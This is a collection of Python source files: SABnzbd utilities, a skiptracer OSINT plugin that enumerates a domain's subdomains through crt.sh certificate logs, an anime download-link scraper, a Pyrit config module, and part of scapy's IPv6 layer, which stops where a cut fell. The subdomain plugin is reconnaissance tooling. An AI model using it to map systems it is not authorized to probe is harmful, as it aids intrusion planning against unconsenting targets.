metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "84KaliPleXon3/sabnzbd",
"score": 3
} |
#### File: sabnzbd/utils/getperformance.py
```python
import platform
import subprocess
def getcpu():
# find the CPU name (which needs a different method per OS), and return it
# If none found, return platform.platform().
cputype = None
try:
if platform.system() == "Windows":
import _winreg as winreg # needed on Python 2
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
cputype = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
elif platform.system() == "Darwin":
cputype = subprocess.check_output(['sysctl', "-n", "machdep.cpu.brand_string"]).strip()
elif platform.system() == "Linux":
for myline in open("/proc/cpuinfo"):
if myline.startswith('model name'):
# Typical line:
# model name : Intel(R) Xeon(R) CPU E5335 @ 2.00GHz
cputype = myline.split(":", 1)[1] # get everything after the first ":"
break # we're done
except:
# An exception, maybe due to a subprocess call gone wrong
pass
if cputype:
# OK, found. Remove unnneeded spaces:
cputype = " ".join(cputype.split())
else:
# Not found, so let's fall back to platform()
cputype = platform.platform()
return cputype
def getpystone():
# Iteratively find the pystone performance of the CPU
# Prefers using Python's standard pystones library, otherwise SABnzbd's pystones library
try:
# Try to import from the python standard library
from test.pystone import pystones
except:
try:
# fallback: try to import from SABnzbd's library
from pystone import pystones
except:
return None # no pystone library found
# if we arrive here, we were able to succesfully import pystone, so start calculation
maxpystone = None
# Start with a short run, find the the pystone, and increase runtime until duration took > 0.1 second
for pyseed in [1000, 2000, 5000, 10000, 20000, 50000, 100000, 200000]:
duration, pystonefloat = pystones(pyseed)
maxpystone = max(maxpystone, int(pystonefloat))
# Stop when pystone() has been running for at least 0.1 second
if duration > 0.1:
break
return maxpystone
if __name__ == '__main__':
print getpystone()
print getcpu()
```
#### File: sabnzbd/utils/pathbrowser.py
```python
import os
if os.name == 'nt':
import win32api, win32con, win32file
MASK = win32con.FILE_ATTRIBUTE_DIRECTORY | win32con.FILE_ATTRIBUTE_HIDDEN
TMASK = win32con.FILE_ATTRIBUTE_DIRECTORY
DRIVES = (2, 3, 4)
NT = True
else:
NT = False
import sabnzbd
_JUNKFOLDERS = (
'boot', 'bootmgr', 'cache', 'msocache', 'recovery', '$recycle.bin', 'recycler',
'system volume information', 'temporary internet files', # windows specific
'.fseventd', '.spotlight', '.trashes', '.vol', 'cachedmessages', 'caches', 'trash' # osx specific
)
# this is for the drive letter code, it only works on windows
if os.name == 'nt':
from ctypes import windll
# adapted from http://stackoverflow.com/questions/827371/is-there-a-way-to-list-all-the-available-drive-letters-in-python/827490
def get_win_drives():
""" Return list of detected drives """
assert NT
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
if (bitmask & 1) and win32file.GetDriveType('%s:\\' % letter) in DRIVES:
drives.append(letter)
bitmask >>= 1
return drives
def folders_at_path(path, include_parent = False, show_hidden = False):
""" Returns a list of dictionaries with the folders contained at the given path
Give the empty string as the path to list the contents of the root path
under Unix this means "/", on Windows this will be a list of drive letters)
"""
from sabnzbd.encoding import unicoder
if path == "":
if NT:
entries = [{'name': letter + ':\\', 'path': letter + ':\\'} for letter in get_win_drives()]
entries.insert(0, {'current_path': 'Root'})
return entries
else:
path = '/'
# walk up the tree until we find a valid path
path = sabnzbd.misc.real_path(sabnzbd.DIR_HOME, path)
while path and not os.path.isdir(path):
if path == os.path.dirname(path):
return folders_at_path('', include_parent)
else:
path = os.path.dirname(path)
# fix up the path and find the parent
path = os.path.abspath(os.path.normpath(path))
parent_path = os.path.dirname(path)
# if we're at the root then the next step is the meta-node showing our drive letters
if path == parent_path and os.name == 'nt':
parent_path = ""
file_list = []
try:
for filename in os.listdir(path):
fpath = os.path.join(path, filename)
try:
if NT:
doit = (win32api.GetFileAttributes(fpath) & MASK) == TMASK and filename != 'PerfLogs'
elif not show_hidden:
doit = not filename.startswith('.')
else:
doit = True
except:
doit = False
if doit:
file_list.append({ 'name': unicoder(filename), 'path': unicoder(fpath) })
file_list = filter(lambda entry: os.path.isdir(entry['path']), file_list)
file_list = filter(lambda entry: entry['name'].lower() not in _JUNKFOLDERS, file_list)
file_list = sorted(file_list, lambda x, y: cmp(os.path.basename(x['name']).lower(), os.path.basename(y['path']).lower()))
except:
# No access, ignore
pass
file_list.insert(0, {'current_path': path})
if include_parent and parent_path != path:
file_list.insert(1,{ 'name': "..", 'path': parent_path })
return file_list
```
#### File: sabnzbd/utils/rsslib.py
```python
import xml.sax.saxutils
#------------------------------------------------------------------------------
def encode_for_xml(unicode_data, encoding='ascii'):
"""
Encode unicode_data for use as XML or HTML, with characters outside
of the encoding converted to XML numeric character references.
"""
try:
return unicode_data.encode(encoding, 'xmlcharrefreplace')
except ValueError:
# ValueError is raised if there are unencodable chars in the
# data and the 'xmlcharrefreplace' error handler is not found.
# Pre-2.3 Python doesn't support the 'xmlcharrefreplace' error
# handler, so we'll emulate it.
return _xmlcharref_encode(unicode_data, encoding)
def _xmlcharref_encode(unicode_data, encoding):
"""Emulate Python 2.3's 'xmlcharrefreplace' encoding error handler."""
chars = []
# Step through the unicode_data string one character at a time in
# order to catch unencodable characters:
for char in unicode_data:
try:
chars.append(char.encode(encoding, 'strict'))
except UnicodeError:
chars.append('&#%i;' % ord(char))
return ''.join(chars)
class RSS:
# """
# RSS
#
# This class encapsulates the creation of an RSS 2.0 feed
#
# The RSS2.0 spec can be found here:
# http://blogs.law.harvard.edu/tech/rss
#
#
# RSS validator : http://rss.scripting.com
#
#
# The generation of an RSS feed is simple, the following is a
# sample:
# from rsslib import RSS, Item, Namespace
# rss = RSS()
# rss.channel.link = "http://channel.com"
# rss.channel.title = "my channel title"
# rss.channel.description = "my channel description"
#
# ns = Namespace( "foobar", "http://foobar.baz" )
# rss.channel.namespaces.append( ns )
#
# item = Item()
# item.link = "http://link.com"
# item.description = "my link description"
# item.title ="my item title"
# item.nsItems[ns.name + ":foo"] = "bar"
# rss.channel.items.append( item )
#
# item = Item()
# item.link = "http://link2.com"
# item.description = "my link2 description"
# item.title ="my item2 title"
# item.nsItems[ns.name +":foo"] = "foo bar baz"
# rss.channel.items.append( item )
#
# print rss.write()
#
# output:
# <?xml version="1.0" encoding="UTF-8"?>
# <rss version="2.0" xmlns:foobar=http://foobar.baz >
# <channel>
# <title>my channel title</title>
# <link>http://channel.com</link>
# <description>my channel description</description>
#
# <item><title>my item title</title>
# <link>http://link.com</link>
# <description>my link description</description>
# <foobar:foo>bar</foobar:foo>
# </item>
#
# <item><title>my item2 title</title>
# <link>http://link2.com</link>
# <description>my link2 description</description>
# <foobar:foo>foo bar baz</foobar:foo>
# </item>
#
# </channel>
# </rss>
#
# author: cmallory /a t/ berserk /dot/ o r g
# """
def __init__(self):
self.channel = Channel()
self.version = "2.0"
self.contents = None
# if __name__ == "__main__" :
# from rsslib import RSS, Item, Namespace
# rss = RSS()
# rss.channel.link = "http://channel.com"
# rss.channel.title = "my channel title"
# rss.channel.description = "my channel description"
#
# ns = Namespace( "foobar", "http://foobar.baz" )
# rss.addNamespace( ns )
#
# item = Item()
# item.link = "http://link.com"
# item.description = "my link description"
# item.title ="my item title"
#
# item.enclosure.url = "http://enclosure.url.com"
# item.enclosure.length = 12345
# item.enclosure.type = "audio/mpeg"
#
# item.nsItems[ns.name + ":foo"] = "bar"
# rss.addItem( item )
#
# item = Item()
# item.link = "http://link2.com"
# item.description = "my link2 description"
# item.title ="my item2 title"
# item.nsItems[ns.name +":foo"] = "foo bar baz"
# rss.addItem( item )
#
# print rss.write()
#Write out the rss document
def write( self ):
self.contents = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
#contents += "<!--\n Last " + cnt + " urls to be shrunk \n-->\n"
self.contents += "<rss version=\"" + self.version + "\" "
if ( self.channel is not None and self.channel.namespaces is not None ):
for ns in self.channel.namespaces :
self.contents += "xmlns:" + ns.name + "=\"" + ns.url + "\" "
self.contents += ">\n"
self.contents += self.generateChannel()
self.contents += "</rss>\n";
return self.contents
#Generates everything contained in a <channel> element
def generateChannel( self ):
contents = ""
if ( self.channel.initialized() ):
contents += "<channel>\n"
contents += self.optionalWrite("title", self.channel.title );
contents += self.optionalWrite("link", self.channel.link );
contents += self.optionalWrite("description", self.channel.description );
contents += self.optionalWrite("language", self.channel.language );
contents += self.optionalWrite("copyright", self.channel.copyright );
contents += self.optionalWrite("category", self.channel.category );
contents += self.optionalWrite("managingEditor", self.channel.managingEditor );
contents += self.optionalWrite("webMaster", self.channel.webMaster );
contents += self.optionalWrite("pubDate", self.channel.pubDate );
contents += self.optionalWrite("lastBuildDate", self.channel.lastBuildDate );
contents += self.optionalWrite("docs", self.channel.docs );
contents += self.optionalWrite("cloud", self.channel.cloud );
contents += self.optionalWrite("ttl", self.channel.ttl );
contents += self.optionalWrite("generator", self.channel.generator );
contents += self.optionalWrite("image", self.channel.image );
contents += self.optionalWrite("rating", self.channel.rating );
contents += self.optionalWrite("textInput", self.channel.textInput );
contents += self.optionalWrite("skipHours", self.channel.skipHours );
contents += self.optionalWrite("skipDays", self.channel.skipDays );
contents += "\n" + self.generateItems() + "</channel>\n"
else :
contents = "[Channel not properly initialized. "
contents +="A required field is not set.(title/link/description]"
return contents
#Generates all items within a channel
def generateItems( self ):
c = ""
for i in self.channel.items :
c += "<item>"
c += self.optionalWrite("title", i.title);
c += self.optionalWrite("link", i.link );
c += self.optionalWrite("description", i.description);
c += self.optionalWrite("author", i.author );
c += self.optionalWrite("pubDate", str(i.pubDate) )
c += self.optionalWrite("category", i.category )
c += self.optionalWrite("comments", i.comments )
c += self.optionalWrite("guid", i.guid )
c += self.optionalWrite("source", i.source )
if ( i.enclosure.url != "" ):
c+= "<enclosure url=\"" + i.enclosure.url + "\" "
c+= "length=\"" + str(i.enclosure.length )+ "\" "
c+= "type=\"" + i.enclosure.type + "\"/>\n"
for k in i.nsItems.keys():
c += self.optionalWrite( k , i.nsItems[ k ] )
c += "</item>\n\n"
return c
def addNamespace( self, ns ):
if ( self.channel.namespaces is not None ):
self.channel.namespaces.append( ns )
def addItem( self, item ):
if ( self.channel is not None):
self.channel.items.append( item )
def optionalWrite( self, key, val ):
if ( val is not None and val != "" ):
return "<" + key + ">" + encode_for_xml(xml.sax.saxutils.escape(val)) + "</" + key + ">\n"
else:
return ""
#Namespace
class Namespace:
def __init__( self, name, url ):
self.url = url
self.name = name
class Channel:
# """
# Channel
#
# (http://blogs.law.harvard.edu/tech/rss)
#
# This object represents an RSS channel (as of ver2.0)
# """
def __init__( self ):
#
# Required Fields
#
self.title= None
self.link= None
self.description= None
#
# Optional Fields
#
self.language = ""
self.copyright = ""
self.managingEditor = ""
self.webMaster = ""
self.pubDate = ""
self.lastBuildDate = ""
self.category = ""
self.generator = ""
self.docs = ""
self.cloud = ""
self.ttl = ""
self.image = ""
self.rating = ""
self.textInput = ""
self.skipHours = ""
self.skipDays = ""
self.items = []
self.namespaces = []
def initialized( self ):
return self.title is not None and self.link is not None and self.description is not None
class Item:
# """
# Item
#
# http://blogs.law.harvard.edu/tech/rss#hrelementsOfLtitemgt
#
# A channel may contain any number of <item>s. An item may
# represent a "story" -- much like a story in a newspaper or magazine;
# if so its description is a synopsis of the story, and the link
# points to the full story. An item may also be complete in itself,
# if so, the description contains the text (entity-encoded HTML is
# allowed; see examples), and the link and title may be omitted.
# All elements of an item are optional, however at least one of
# title or description must be present.
# """
def __init__( self ):
self.title = ""
self.link = ""
self.description = ""
self.author = ""
self.category = ""
self.comments = ""
self.enclosure = ""
self.guid = ""
self.pubDate = ""
self.source = ""
self.enclosure = Enclosure()
self.nsItems = {}
class Enclosure:
# """
# Enclosure
#
# <enclosure> sub-element of <item>
#
# <enclosure> is an optional sub-element of <item>.
#
# It has three required attributes:
#
# url: says where the enclosure is located,
# length: says how big it is in bytes, and
# type: says what its type is, a standard MIME type.
#
# The url must be an http url.
#
# Example: <enclosure url="http://www.scripting.com/mp3s/weatherReportSuite.mp3" length="12216320" type="audio/mpeg" />
#
# """
def __init__(self):
self.url = ""
self.length = 0
self.type = ""
```
#### File: sabnzbd/util/apireg.py
```python
import _winreg
def reg_info(user):
""" Return the reg key for API """
if user:
# Normally use the USER part of the registry
section = _winreg.HKEY_CURRENT_USER
keypath = r"Software\SABnzbd"
else:
# A Windows Service will use the service key instead
section = _winreg.HKEY_LOCAL_MACHINE
keypath = r"SYSTEM\CurrentControlSet\Services\SABnzbd"
return section, keypath
def get_connection_info(user=True):
""" Return URL of the API running SABnzbd instance
'user' == True will first try user's registry, otherwise system is used
"""
section, keypath = reg_info(user)
url = None
try:
hive = _winreg.ConnectRegistry(None, section)
key = _winreg.OpenKey(hive, keypath + r'\api')
for i in range(0, _winreg.QueryInfoKey(key)[1]):
name, value, val_type = _winreg.EnumValue(key, i)
if name == 'url':
url = value
_winreg.CloseKey(key)
except WindowsError:
pass
finally:
_winreg.CloseKey(hive)
# Nothing in user's registry, try system registry
if user and not url:
url = get_connection_info(user=False)
return url
def set_connection_info(url, user=True):
""" Set API info in register """
section, keypath = reg_info(user)
try:
hive = _winreg.ConnectRegistry(None, section)
try:
_winreg.CreateKey(hive, keypath)
except:
pass
key = _winreg.OpenKey(hive, keypath)
mykey = _winreg.CreateKey(key, 'api')
_winreg.SetValueEx(mykey, 'url', None, _winreg.REG_SZ, url)
_winreg.CloseKey(mykey)
_winreg.CloseKey(key)
except WindowsError:
if user:
set_connection_info(url, user=False)
finally:
_winreg.CloseKey(hive)
def del_connection_info(user=True):
""" Remove API info from register """
section, keypath = reg_info(user)
try:
hive = _winreg.ConnectRegistry(None, section)
key = _winreg.OpenKey(hive, keypath)
_winreg.DeleteKey(key, 'api')
_winreg.CloseKey(key)
except WindowsError:
if user:
del_connection_info(user=False)
finally:
_winreg.CloseKey(hive)
def get_install_lng():
""" Return language-code used by the installer """
lng = 0
try:
hive = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
key = _winreg.OpenKey(hive, r"Software\SABnzbd")
for i in range(0, _winreg.QueryInfoKey(key)[1]):
name, value, val_type = _winreg.EnumValue(key, i)
if name == 'Installer Language':
lng = value
_winreg.CloseKey(key)
except WindowsError:
pass
finally:
_winreg.CloseKey(hive)
if lng in LanguageMap:
return LanguageMap[lng]
return 'en'
# Map from NSIS-codepage to our language-strings
LanguageMap = {
'1033': 'en',
'1036': 'fr',
'1031': 'de',
'1043': 'nl',
'1035': 'fi',
'1045': 'pl',
'1053': 'sv',
'1030': 'da',
'2068': 'nb',
'1048': 'ro',
'1034': 'es',
'1046': 'pr_BR',
'3098': 'sr',
'1037': 'he',
'1049': 'ru',
'2052': 'zh_CN'
}
if __name__ == '__main__':
print 'URL = %s' % get_connection_info()
print 'Language = %s' % get_install_lng()
# del_connection_info()
# set_connection_info('localhost', '8080', 'blabla', user=False)
``` |
{
"source": "84KaliPleXon3/skiptracer",
"score": 2
} |
#### File: skiptracer/plugins/crt.py
```python
from __future__ import absolute_import, print_function
import re
from plugins.base import PageGrabber
from .colors import BodyColors as bc
try:
import __builtin__ as bi
except ImportError:
import builtins as bi
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
import re
import json
import requests
class SubDomainGrabber(PageGrabber): # crt.sh scraper for abusing Certificate Transparency log lookups
def get_info(self, domain): # returns information about a domains subdomains
print("["+bc.CPRP+"?"+bc.CEND+"] "+bc.CCYN + "crt.sh " + bc.CEND)
domain2 = domain.split("//")[-1].split("/")[0].split('?')[0] #strip the input to just the domain name and TLD only
req = requests.get("https://crt.sh/?q=%.{}&output=json".format(domain2))
if req.status_code != 200:
print(" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No results were found ...\n"+bc.CEND)
exit(1)
jsondata = json.loads('[{}]'.format(req.text.replace('}{', '},{')))
subdomainlist = []
for (key,value) in enumerate(jsondata):
subdomainlist.append(value['name_value'])
subdomainlist = sorted(set(subdomainlist))
for subdomain in subdomainlist:
if not (re.search("^\*\.", subdomain)):
print("["+bc.CGRN+"+"+bc.CEND+"] "+bc.CRED+"Subdomain: "+bc.CEND+"{}".format(subdomain))
self.info_dict.update({
"subdomain": subdomain
})
bi.outdata['crt'] = self.info_dict
if len(self.info_dict) == 0:
print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No source returned, try again later ...\n"+bc.CEND)
return
else:
print()
return
```
#### File: skiptracer/plugins/reporter.py
```python
from docx import Document
from docx.shared import Inches
import __builtin__ as bi
class ReportGenerator:
def __init__(self):
pass
def newdoc(self):
bi.document = Document()
def addtitle(self, title):
bi.document.add_heading(title, 0)
def writepara(self, paragraph):
bi.document.add_paragraph(paragraph)
def addheader(self, header, level):
bi.document.add_heading(header, level=level)
def addquote(self, quote):
bi.document.add_paragraph(quote, style='Intense Quote')
def unorderedlist(self, data):
bi.document.add_paragraph(data, style='List Bullet')
def unorderedlevel(self, data):
bi.document.add_paragraph(data, style='List Bullet 2')
def orderedlist(self, data):
bi.document.add_paragraph(data, style='List Number')
def addimg(self, imglocation):
document.add_picture(imglocation) #, width=Inches(1.25))
def addtable(self, data, rows, cols):
table = bi.document.add_table(rows=rows, cols=cols)
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Qty'
hdr_cells[1].text = 'Id'
hdr_cells[2].text = 'Desc'
for qty, id, desc in records:
row_cells = table.add_row().cells
row_cells[0].text = str(qty)
row_cells[1].text = id
row_cells[2].text = desc
def addlinebrk(self):
bi.document.add_page_break()
def savefile(self, filename):
bi.document.save(filename)
``` |
{
"source": "84KaliPleXon3/Smhdk",
"score": 3
} |
#### File: 84KaliPleXon3/Smhdk/samehadaku.py
```python
import requests
import re
import base64
class Samehadaku:
def __init__(self, q):
self.url = 'https://www.samehadaku.tv/'
self.links = []
self.title = None
self.cache = {}
self.href = None
self.rlinks = []
q = q + ' episode subtitle indonesia'
r = requests.get(self.url, params={'s': q})
results = re.findall(
'<h3 class="post-title"><a href="(.+?)" ' +
'title="(.+?)">.+</a></h3>',
r.text, re.M | re.I)
fail_indicator = 'Sorry, but nothing matched your search terms.'
if len(results) and fail_indicator not in r.text:
self.href = results[0][0]
self.title = results[0][1]
def _fetch(self, u):
if not u.startswith(self.url):
return False
page = requests.get(u)
links = re.findall(
r'<li.*<a.*?href="(.+?)".*?>MU.*?</a>.*?</li>',
page.text, re.M | re.I)
self.links = links
self.page_text = page.text
return True
def get_links(self):
if not self.href or (self._fetch(self.href) and not self.links):
return False
def clean_type(raw_html):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html).lower()
hf_types_pr = ['3gp', 'x265', 'mp4', 'mkv']
for t in hf_types_pr:
if t in cleantext:
return t
return cleantext.strip()
vtypes = re.findall('^(<p.+?)\n.*?download-eps',
self.page_text, re.M | re.I)
sections = {}
for i, v in enumerate(vtypes):
if i+1 != len(vtypes):
sections[clean_type(v)] = self.page_text[self.page_text.find(
v):self.page_text.find(vtypes[i+1]):]
else:
sections[clean_type(
v)] = self.page_text[self.page_text.find(v):]
rlinks = []
for link in self.links: # iterate over links
for vtype, text in sections.items(): # check for section
if link in text:
vquals = re.findall(
r'<li.*?>.*?<strong>(.+?)<', text, re.M | re.I)
for i, vqual in enumerate(vquals):
if i+1 != len(vquals):
if link in text[text.find(vqual):text.find(
vquals[i+1]):]:
break
elif link in text[text.find(vqual):]:
break
break
else:
continue
if (link and vtype and vqual):
rlinks.append(
{'link': link,
'type': vtype.lower(), 'quality': vqual.lower()})
self.rlinks = rlinks
if __name__ == '__main__':
s = Samehadaku('boruto')
s.get_links()
print(s.rlinks)
``` |
{
"source": "84KaliPleXon3/sslstrip-hsts-openwrt",
"score": 2
} |
#### File: site-packages/cpyrit/config.py
```python
from __future__ import with_statement
import os
import sys
def default_config():
config = {'default_storage': 'file://', \
'rpc_server': 'false', \
'rpc_announce': 'true', \
'rpc_announce_broadcast': 'false', \
'rpc_knownclients': '', \
'workunit_size': '75000', \
'limit_ncpus': 0}
return config
def read_configfile(filename):
config = default_config()
with open(filename, 'rb') as f:
for line in f:
if line.startswith('#') or '=' not in line:
continue
option, value = map(str.strip, line.split('=', 1))
if option in config:
config[option] = value
else:
print >> sys.stderr, "WARNING: Unknown option '%s' " \
"in configfile '%s'" % (option, filename)
return config
def write_configfile(config, filename):
with open(filename, 'wb') as f:
for option, value in sorted(config.items()):
f.write("%s = %s\n" % (option, value))
configpath = os.path.expanduser(os.path.join('~', '.pyrit'))
default_configfile = os.path.join(configpath, 'config')
if os.path.exists(default_configfile):
cfg = read_configfile(default_configfile)
else:
cfg = default_config()
if not os.path.exists(configpath):
os.makedirs(configpath)
write_configfile(cfg, default_configfile)
```
#### File: scapy/layers/inet6.py
```python
import socket
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
from scapy.config import conf
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
of the neighbor with specified IPv6 address addr. 'src' address is
used as source of the message. Message is sent on iface. By default,
timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
def getmacbyip6(ip6, chainCC=0):
"""
Returns the mac address to be used for provided 'ip6' peer.
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "<Net6 %s>" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
IP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
